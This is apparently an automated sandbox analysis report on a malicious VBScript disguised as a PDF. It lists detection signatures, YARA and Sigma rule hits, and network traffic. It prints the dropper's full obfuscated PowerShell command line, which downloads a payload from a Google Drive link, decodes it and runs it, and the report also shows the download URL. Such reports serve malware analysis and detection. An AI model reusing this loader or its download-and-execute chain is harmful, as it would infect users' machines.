Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
U00b7pdf.vbs

Overview

General Information

Sample name:U00b7pdf.vbs
renamed because original name is a hash value
Original sample name:() 24 (240415)pdf.vbs
Analysis ID:1425936
MD5:6e74f3450b6a5719b9e71f6ea32295ce
SHA1:790344f4225b4a5e904f3e06de6aac6fa9fe58d5
SHA256:6c0c6d699be7442dcd1e34507ac5f9103fcf2a220b032e2e7159805c820a0483
Tags:vbs
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Potential dropper URLs found in powershell memory
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • wscript.exe (PID: 3948 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U00b7pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6500 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Storvesirerne = 1;$Theologizing='Substrin';$Theologizing+='g';Function Rekordjagt($Spermosphere){$Tryghedsnarkomanerne=$Spermosphere.Length-$Storvesirerne;For($Ichthyocentaur=7; $Ichthyocentaur -lt $Tryghedsnarkomanerne; $Ichthyocentaur+=(8)){$Cottiers+=$Spermosphere.$Theologizing.Invoke($Ichthyocentaur, $Storvesirerne);}$Cottiers;}function Dentagra176($nittenaarsfdselsdag){. ($Systematist) ($nittenaarsfdselsdag);}$Skrive=Rekordjagt 'Sammen MRb igttoMantramzMice laiReformbl chattelDiplom aTilsend/Skunk r5bomrker. Stri.i0Revalua Ukrist(StatuslWInadjusiAco otlnknitweadForure ofjantenwButtonhsBrugsbe UnimpaiNWienersTE.itaxi obriqu1Bstern 0Kyriali.Und,rda0Aerodyn; ,uling PaedonyW SpectriAllergenQuadric6 Ekstem4Apodeme; Picker Femrernx Ellekr6exies o4Fo,film;.rontag Spaan ar Disenavvvesf,o:Circumf1Tryllek2Uncompr1Unimma,.volemit0Rygskst)Poriapr Ungka lG EdderkeUngainlcRes ectkUnlyricoSexolog/ovnhuse2 econce0 hummer1Sirupsh0Notidan0Marinae1Andengr0Erkyndi1Trkvogn DiamantFNonharmiLicen irUncoloueOleatesfNonumbro GlasblxKasse t/ hromat1Copalin2Satanis1 Deriva. Skmtev0Hegemon ';$Rubys=Rekordjagt ' StylteUProsecusOrganiseFade,urr Fjogsf-TyristoASlufssygAn.ideceidentitnShowtimtPeri on ';$Cargoliner=Rekordjagt 'Ast,roih Rep cktSlickertWindroapNonj.rasBoe,neh:Pra inc/Estampi/Mauveagduranophrmalatesistvnersv C ckileTelefon.TrbaadegTornblaoNonreguo ShoalhgBrtsejllkont.nte Voltes.RetstilcVatteriouncathomBaadud,/PaavistuInhalercbane.ak?Frontene Br,dsaxinvocatpv gttaaoDk skoprLubricat portef=OmtalerdSkoleryobrevvekwDubiousnEncastel valitoGipsdepaUnderlodCentime& Undefei,adiostdCon,oci=R.kkest1Bals mmmMo.dilymKatakin5Ar,edtauValentiFAmusivea,orelsndphl.benkSaloond5StatiketKuskeneXB,sttelj VovehaiVitalisZbewidoweCarnosiYOvera eXAld,rmajLhduninWEpa.ortHDaar,kaHAnkl gjF Ventili ,vaporX kanapeFUnmantlf Ma,ked-Karav nB vertisHAdo tivV NonadvBS uljaz_Quotati ';$Constabless=Rekordjagt ' Acture> Immate ';$Systematist=Rekordjagt 'TimbresislavebaeBegonerxSjofeli ';$Ankyloproctia106 = Rekordjagt ' H,ricoe Frank cOmtalenhBeerbiboFreedst Lewist,%OvertypaQ,adrisp synonyp StraffdSerenada Rav lstTorpedoa,rachio% H.plit\WeekendIUsketbarEpicantr h erpre ElectopElephanl KonvenaBod velcAkklimaeGoumieraCircumsbEurop mlSelen gegraablenForsikreUdstra s .ursyls h drum.FacetteSOverratuBastedecEuch,or Solav k&Col.ack&A,gangs GoitereAnsttemcCoazervhSeniorso Proven Contigu$Apperce ';Dentagra176 (Rekordjagt ' Subcya$JourneygMeningol dsboeo Su,ersb ilkombaGnetacelBibliog:Afpa.erHColumbaybec amepSe,plese FluorbrDoerencs LufttreForsyn nAf,rismsStrygejiUnrustibHeldentiGla rinl Krni.ei Draht,tFrictifyOzonate=Washda,(TelefoncSm,dresm hermicdAdoxace Genvisi/.vlningcAdmir l hermov$UncompoAProveninKommandk Unrewoy Ingva lGrimassoHuje trpCowweedrlauds,nokirigamcVe.denst BetutoiCholinea Krimin1Kl,nset0Musikpd6Intermi)pharmac ');Dentagra176 (Rekordjagt 'L gendi$SirrahsgRegulerlFilm.tro ThronibKli ikaapavingslPeridio:DetrudiVWaflibdiTrunkserJunke.egUdmundeiRundkinn H regea Strengl BreastlSatsensyVisumhy= Frif,n$Fatho aCLavritsa HeinerrHier.magDomineeoHjttalelTornskai Lum,ernBestteleP,lleeor Rest,a.D.uglcosAcinetapAfskedslNecrophiSuperfatBiplans(Hem gen$TrnjbrtCUnkerchoFuldbefnRabbites LilithtCelluliaKlagerebIso.iazlCullende frdigesSystemis Akkli.)moujiks ');$Cargoliner=$Virginally[0];Dentagra176 (Rekordjagt 'Ell.kra$BavianhgSansninl,verdazoPa alleb Ac,ievaFjerdral For,se: sisyfoTFjortenrLevemuliOutspartStjko tu,isammebUnderboeSkolemerTilt gec AlgkiruSurfperlFu.ionsasalutatrleik.sg= VaertsNAntropoeFnike.dwDummere-E peditOTillavebOrchiocjRescoreeSpyttebc.ippingtD mogra KromgarS Audiomy alaxisSufeismtP,eudonedecurvemHusband.Epap phNLinkx.peUnintuitMisimag.Porto,rWVinkelse BrantsbUsigtbaComstninl Lunterisa.fundeCiviestn HypopytTric nn ');Dentagra176 (Rekordjagt 'Ejendom$NdkcaudTAm.ulanrTotalisi Str pntAlexiusuReprescb,estsigeMalodorr Ne trac,etleheuGulfyhilIntendeaDittychrScrideu.Schesi HCh,ndroeBreatheaUngdomsdCycloheeFractiorBesi desPastaen[En,kter$BoltheaRCobbl suAfgangsbLgelf ey TilvejsM,sshap] Deemph=Orthoxa$RhesuspS .asovnkEzaskrorRatinepiStraighvFlorineeForhast ');$Reinitializes=Rekordjagt 'HvilendTBestyrkrProdukti EtikettOverwa u VegetebCommunie FrstebrPulsi.nc Kriseru AntimelBe.eficaEstraderRegnska.BestrniDAlbigeno CuffspwReetablnNevaditl,ederalo TabelsaInfantedMisformFMicrospiAlkyderlgluti oeEftersl( Unfrac$ PrerecCDeludinaSn,ptagrRediss,gVamfontoperfectlExos eli ForstanDrvtyggeAugmentrTrretum, ,ernsb$ GibuseOValerolb pidsmulraindroiSk.pfulg Timneva Immor,tPlasmaciStall,noSocialbn Indskrs OronokrRoquelaeRkee.gltWarfaret Frsteiefalsn.nnFlerhedsTrach o) Skrive ';$Reinitializes=$Hypersensibility[1]+$Reinitializes;$Obligationsrettens=$Hypersensibility[0];Dentagra176 (Rekordjagt 'Weeken.$OvigermgMbelsnelHorizonoHydrobrbAraneinaTankstal Crumbl: regentS Bordvie EpicysmFormyndi ThyroafUndistoeThumbdir lyrehaoTidskrauShrinalskva,rat=Gangb.t(Driver.T .kolesePsychoasBolsjevtEfterve-NjagtigPGrimassa nsomsttUniversh Person Guelphi$ Mal ilOPeriferbYngelsolsvin,kdiFranc sgBundtekaFrems,it D,triniBssens oMetacarnDisa.ses Anti erPunctuaeAfskovntvsentlitIntertieNoalsnon Morel,s Aigudh)Perusal ');while (!$Semiferous) {Dentagra176 (Rekordjagt 'Virt.os$hypotymgDisk,ntlAnsvarsoSkruea,bArchdioaCursi gltourers:UdspredCHyperagu Kngtenr h,wlsbcE eterfuA,akolulAuthentiArbejdsotilhrsf1Spygatt6 Krydde0Fukssva= Gryrsa$LaegkartFjortenrShareowuPartikae Alvide ') ;Dentagra176 $Reinitializes;Dentagra176 (Rekordjagt 'DismissSJobb rit odbolaF,turisrSlikportInjust.-Betonb S UnderrlSprezzaeDeltidseLigularpAgtelse stim rn4Capr,ll ');Dentagra176 (Rekordjagt 'U.vener$ HalvdrgFl,mndelFret,oroRedimenbMagis,eaAnensrelOutbble:Sp.dbjnS ArsenieDi,ulgamReproofiO rrsaafUn corneReasc,nr Spl,ttoTo vinkuMetalans menis=Analyse(VideoplTHj.rtebeSidney,s Barkent Sneakb- C epepPAnchis aBorshtatHyperaehKomiker Jeelped$ PlagioOBlunderbInt.osplBaghussiSt.tssagPsycholaAboiteatSlyngeliPointtaoas.hyxin Tanny sEx,ortarTikampeePaatry,tSyphilotTrullsseVitessenPosturesPoetica) Lentic ') ;Dentagra176 (Rekordjagt 'Mokkasi$K.anategWindchelHftetseo Fag idbPrv tekaReddsmalSkonner: Prci eW Op rtcaPte,ygolRigsbyfkPistolaeIndbildn Demilie Spirit=Kise su$UnkamedgDdspatrlRamexdioFlamberbKra,tanaKatapu lNitroge:PrdikatP Offs.crKraftudeTrommesa Artf.lcUdgivelc E.domoutransprsexostott Taageroselvporm,eminereOrdlistdGrundst+G.seous+Unschol%,reyfly$Erudit,VTekstbeiKileskrrStopklogMirdscuiBlufrdinI,dhsteaBankerolSerenesl Exc,mmyEpicond.He.skabcLigasedoSnogehau machinn Deprivt Gabrie ') ;$Cargoliner=$Virginally[$Walkene];}Dentagra176 (Rekordjagt ' gascon$Bowlin,gL.ndkralPikketroSi imidb S,stemaBihulerlBedro.v:ragaersGUnpala.eRe,otednFrontoon BoligseBasketkmRdligs.rEm.ergeykildlumsOuttel.t minisyeUdpantntKulstof Opgoere=epil ch flawynuG .remfueAfm,grit Tytteb- BusrejCInoffenoGalinsonBubblelt UdvaeleArvem tnLimfabrtinsipid Br.gtfl$HavkattOTrachymbbeseemslDiphycei nwithgcoagu aaDecnetatPersistiNon.enuoatomiesn CiliassAflyssdrPaasknneVelve ptAnnoncetDispatee,ykelbunTrykmaasBjer ni ');Dentagra176 (Rekordjagt 'Chanc,a$Cytoplag Scu.lel Arianio coadapbViaduktaRem mbelUltra o:SendebuSFlersidhHeirleseImposanl Hoved l AntelapCoordinoUnprodut Triole Orbb.gr=Th,esub Stann,r[Um eledSfo drveyMinglinsYau snvtRe eptpeObservemAntipro. postaCSpildevoRafflesnGummyinvSyntakseRecleanrT xifyitFortrol]Dagsbef: Mia,ss:Li ieteFmissilfrGoddampoRm rsskmBinde,tBHandelsaSliderssPr,tosueSjalern6Fragmen4S.ovskaSmaltf.btFalklanrUudholdiTostaven Poonacg.rstatn(Beskytt$ BruserG Hnder.ePennysinEluat.dnBoblekae Fornemm Baandsr Forms yFodsveds riticatGaffelte feudaltUdludei)Unjusti ');Dentagra176 (Rekordjagt 'hommos,$Banefulg PerconlNonbrutoTilbagebPatr nia WaspnelAcaulou:HaandgrS ,lokbecMarengsrWeb tedaSlightewforlag.l Bvelsee revendrSto,tilsolivene Superma=Cor cob Viruci[ ObteneSCarmi iy IaomalsForcipatDeck.nge HydropmF.ldblo.SalvninTEsmarale Eph dsxTran,ort Kolleg. UdbudsEAnalysenve stancGainsaioCyborgsdTransfoiCounternMicrophg Smi hc]Vital t:P,ospho: .abellA PhaseaSMisfaitC ArbejdIFilipsgIG yceri.UnfavouGTroubleeMoto istsatir sS PolymetJulef,srLiniestiSy.sttynRataplagTil,rop(Sandkas$ Acce eSSudsmenh CymbideHirsti lPedagoglRhe.usnpJ risdiokundeaftTanekah) Vaagne ');Dentagra176 (Rekordjagt 'plancie$DynamitgThisllplPhascoloLunulaebUnder laClearehlb kldni:FllenesSAfskrkktAkutfunaNedska,tInterplicanop.cs s ndort,akshisi LgnernkPolemarpSensortrForsumpoAarligegDeckelsrDruideraLyknsknmGteskab2Spunkle6doerene=.yvinsa$TanzaniSCrzettec A.abolrBalanopaMisusedwUfordellForhippeDivisi rR,condis Paa ag.Udsendis HematouGaardrybColliersTraffictUvsentlr UrningiCi,ratenAshiestg Sumlog(Monstrs2Fourche9Deu,obr9 Phrase6Advoka,0Klukkes9 Uncial,D,ddelp3Dorritu0Ra.ioli1Recap t5 Filmsp6Ac tylb) Hjrnes ');Dentagra176 $Statistikprogram26;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1148 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Irreplaceableness.Suc && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 6500INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x10cfc5:$b2: ::FromBase64String(
  • 0x10e0cc:$b2: ::FromBase64String(
  • 0x10e117:$b2: ::FromBase64String(
  • 0x1190d7:$b2: ::FromBase64String(
  • 0x11acd1:$b2: ::FromBase64String(
  • 0x22754a:$b2: ::FromBase64String(
  • 0x227588:$b2: ::FromBase64String(
  • 0x2275c1:$b2: ::FromBase64String(
  • 0x2275fb:$b2: ::FromBase64String(
  • 0x227636:$b2: ::FromBase64String(
  • 0x227672:$b2: ::FromBase64String(
  • 0x2276af:$b2: ::FromBase64String(
  • 0x2276ed:$b2: ::FromBase64String(
  • 0x22772c:$b2: ::FromBase64String(
  • 0x22776c:$b2: ::FromBase64String(
  • 0x2277ad:$b2: ::FromBase64String(
  • 0x2277ef:$b2: ::FromBase64String(
  • 0x227832:$b2: ::FromBase64String(
  • 0x227876:$b2: ::FromBase64String(
  • 0x2278bb:$b2: ::FromBase64String(
  • 0x227a05:$b2: ::FromBase64String(

Other

SourceRuleDescriptionAuthorStrings
amsi64_6500.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xea8c:$b2: ::FromBase64String(
  • 0xdaa8:$s1: -join
  • 0x7254:$s4: +=
  • 0x7316:$s4: +=
  • 0xb53d:$s4: +=
  • 0xd65a:$s4: +=
  • 0xd944:$s4: +=
  • 0xda8a:$s4: +=
  • 0xfebf:$s4: +=
  • 0xff3f:$s4: +=
  • 0x10005:$s4: +=
  • 0x10085:$s4: +=
  • 0x1025b:$s4: +=
  • 0x102df:$s4: +=
  • 0xe287:$e4: Get-WmiObject
  • 0xe476:$e4: Get-Process
  • 0xe4ce:$e4: Start-Process

Sigma Signatures

System Summary

barindex
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U00b7pdf.vbs", ProcessId: 3948, ProcessName: wscript.exe
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U00b7pdf.vbs", ProcessId: 3948, ProcessName: wscript.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Storvesirerne = 1;$Theologizing='Substrin';$Theologizing+='g';Function Rekordjagt($Spermosphere){$Tryghedsnarkomanerne=$Spermosphere.Length-$Storvesirerne;For($Ichthyocentaur=7; $Ichthyocentaur -lt $Tryghedsnarkomanerne; $Ichthyocentaur+=(8)){$Cottiers+=$Spermosphere.$Theologizing.Invoke($Ichthyocentaur, $Storvesirerne);}$Cottiers;}function Dentagra176($nittenaarsfdselsdag){. ($Systematist) ($nittenaarsfdselsdag);}$Skrive=Rekordjagt 'Sammen MRb igttoMantramzMice laiReformbl chattelDiplom aTilsend/Skunk r5bomrker. Stri.i0Revalua Ukrist(StatuslWInadjusiAco otlnknitweadForure ofjantenwButtonhsBrugsbe UnimpaiNWienersTE.itaxi obriqu1Bstern 0Kyriali.Und,rda0Aerodyn; ,uling PaedonyW SpectriAllergenQuadric6 Ekstem4Apodeme; Picker Femrernx Ellekr6exies o4Fo,film;.rontag Spaan ar Disenavvvesf,o:Circumf1Tryllek2Uncompr1Unimma,.volemit0Rygskst)Poriapr Ungka lG EdderkeUngainlcRes ectkUnlyricoSexolog/ovnhuse2 econce0 hummer1Sirupsh0Notidan0Marinae1Andengr0Erkyndi1Trkvogn DiamantFNonharmiLicen irUncoloueOleatesfNonumbro GlasblxKasse t/ hromat1Copalin2Satanis1 Deriva. Skmtev0Hegemon ';$Rubys=Rekordjagt ' StylteUProsecusOrganiseFade,urr Fjogsf-TyristoASlufssygAn.ideceidentitnShowtimtPeri on ';$Cargoliner=Rekordjagt 'Ast,roih Rep cktSlickertWindroapNonj.rasBoe,neh:Pra inc/Estampi/Mauveagduranophrmalatesistvnersv C ckileTelefon.TrbaadegTornblaoNonreguo ShoalhgBrtsejllkont.nte Voltes.RetstilcVatteriouncathomBaadud,/PaavistuInhalercbane.ak?Frontene Br,dsaxinvocatpv gttaaoDk skoprLubricat portef=OmtalerdSkoleryobrevvekwDubiousnEncastel valitoGipsdepaUnderlodCentime& Undefei,adiostdCon,oci=R.kkest1Bals mmmMo.dilymKatakin5Ar,edtauValentiFAmusivea,orelsndphl.benkSaloond5StatiketKuskeneXB,sttelj VovehaiVitalisZbewidoweCarnosiYOvera eXAld,rmajLhduninWEpa.ortHDaar,kaHAnkl gjF Ventili ,vaporX kanapeFUnmantlf Ma,ked-Karav nB vertisHAdo tivV NonadvBS uljaz_Quotati ';$Constabless=Rekordjagt ' Acture> Immate ';$Systematist=Rekordjagt 'TimbresislavebaeBegonerxSjofeli ';$Ankyloproctia106 = Rekordjagt ' H,ricoe Frank cOmtalenhBeerbiboFreedst Lewist,%OvertypaQ,adrisp synonyp StraffdSerenada Rav lstTorpedoa,rachio% H.plit\WeekendIUsketbarEpicantr h erpre ElectopElephanl KonvenaBod velcAkklimaeGoumieraCircumsbEurop mlSelen gegraablenForsikreUdstra s .ursyls h drum.FacetteSOverratuBastedecEuch,or Solav k&Col.ack&A,gangs GoitereAnsttemcCoazervhSeniorso Proven Contigu$Apperce ';Dentagra176 (Rekordjagt ' Subcya$JourneygMeningol dsboeo Su,ersb ilkombaGnetacelBibliog:Afpa.erHColumbaybec amepSe,plese FluorbrDoerencs LufttreForsyn nAf,rismsStrygejiUnrustibHeldentiGla rinl Krni.ei Draht,tFrictifyOzonate=Washda,(TelefoncSm,dresm hermicdAdoxace Genvisi/.vlningcAdmir l hermov$UncompoAProveninKommandk Unrewoy Ingva lGrimassoHuje trpCowweedrlauds,nokirigamcVe.denst BetutoiCholinea Krimin1Kl,nset0Musikpd6Intermi)pharmac ');Dentagra176 (Rekordjagt 'L gendi$SirrahsgRegulerlFilm.tro ThronibKli ikaapavingslPeridio:DetrudiVW

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

  • AV Detection
  • Compliance
  • Software Vulnerabilities
  • Networking
  • System Summary
  • Data Obfuscation
  • Hooking and other Techniques for Hiding and Protection
  • Malware Analysis System Evasion
  • HIPS / PFW / Operating System Protection Evasion
  • Language, Device and Operating System Detection

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
Source: U00b7pdf.vbsReversingLabs: Detection: 15%
Source: unknownHTTPS traffic detected: 172.217.12.142:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.72.129:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb_ source: powershell.exe, 00000002.00000002.1544139108.000002615F69D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.1572957843.0000026177E51000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdb source: powershell.exe, 00000002.00000002.1543947591.000002615F61D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.1572957843.0000026177E51000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1544139108.000002615F69D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb source: powershell.exe, 00000002.00000002.1572957843.0000026177DF2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *n.pdbr source: powershell.exe, 00000002.00000002.1544139108.000002615F69D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbt source: powershell.exe, 00000002.00000002.1572957843.0000026177E51000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rlib.pdb source: powershell.exe, 00000002.00000002.1572957843.0000026177DF2000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

barindex
Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

barindex
Source: powershell.exe, 00000002.00000002.1544405936.00000261616CD000.00000004.00000800.00020000.00000000.sdmpString found in memory: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Source: powershell.exe, 00000002.00000002.1544405936.000002615FCF2000.00000004.00000800.00020000.00000000.sdmpString found in memory: Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Source: powershell.exe, 00000002.00000002.1544405936.000002615FD76000.00000004.00000800.00020000.00000000.sdmpString found in memory: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistp^
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1mm5uFadk5tXjiZeYXjWHHFiXFf-BHVB_ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /download?id=1mm5uFadk5tXjiZeYXjWHHFiXFf-BHVB_&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1mm5uFadk5tXjiZeYXjWHHFiXFf-BHVB_ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /download?id=1mm5uFadk5tXjiZeYXjWHHFiXFf-BHVB_&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: unknownDNS traffic detected: queries for: drive.google.com
Source: wscript.exe, 00000000.00000003.1387704610.000001F4619B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1387163912.000001F4619C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1388165251.000001F4619B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1388384843.000001F4619BF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423874364.000001F461910000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.1388165251.000001F46197A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1387704610.000001F461952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d2e5bd3b22e28
Source: wscript.exe, 00000000.00000003.1422798848.000001F45FB00000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423724918.000001F45FBB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421782701.000001F45FAF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabmesL
Source: wscript.exe, 00000000.00000003.1422798848.000001F45FB00000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423724918.000001F45FBB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421782701.000001F45FAF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enMG
Source: wscript.exe, 00000000.00000003.1388165251.000001F46197A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1387704610.000001F461952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d2e5bd3b22
Source: powershell.exe, 00000002.00000002.1544405936.0000026161637000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000002.00000002.1544405936.0000026161671000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.1568575285.000002616FA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1568575285.000002616F8EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1544405936.000002615FAA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1544405936.000002615F881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1544405936.000002615FAA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1544110626.000002615F641000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micrt.corAut
Source: powershell.exe, 00000002.00000002.1544405936.000002615F881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
